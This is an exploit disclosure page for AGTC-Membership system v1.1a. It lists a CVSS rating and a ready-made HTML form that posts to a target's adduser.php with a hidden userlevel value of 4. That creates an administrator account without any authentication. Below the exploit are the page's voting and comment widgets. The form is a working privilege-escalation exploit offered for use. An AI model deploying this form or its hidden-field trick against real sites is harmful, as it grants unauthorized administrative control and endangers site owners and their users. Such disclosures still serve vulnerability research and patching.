AGTC-Membership system v1.1a (adduser) Remote Add Admin Exploit

2007.10.31
Risk: Medium
Local: No
Remote: Yes
CWE: CWE-287


CVSS Base Score: 7.5/10
Impact Subscore: 6.4/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

<!-- - Product : AGTC-Membership system - Version : 1.1a - Website : http://www.agtc.co.uk - Author : 0x90 - HomePage : WwW.0x90.CoM.Ar - Contact : Guns[at]0x90[dot]com[dot]ar - Problem : Admin Added Access. --> <form name="form1" method="post" action="http://[target]/adduser.php"> <h3 align="center">AGTC-Membership system v1.1a (adduser) Remote Add Admin Exploit</h3> <table width="40%" border="1" align="center" bordercolor="#000000"> <tr> <td width="20%"><div align="right"><strong>User Name:</strong></div></td> <td width="40%"><input name="username" type="text" id="username" value="" maxlength="15"></td> </tr> <tr> <td><div align="right"><strong>Password:</strong></div></td> <td><input name="userpass" type="password" id="userpass" value="" maxlength="15"></td> </tr> <tr> <td><div align="right"><strong>Email Address:</strong></div></td> <td><input name="useremail" type="text" id="useremail" value="" maxlength"25"></td> </tr> <input name="userlevel" type="hidden" id="userlevel" value="4"> <tr> <td></td> <td><input type="submit" name="Submit" value="Add User"> <input type="reset" name="Submit2" value="Reset"></form></td> </tr> </table>


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top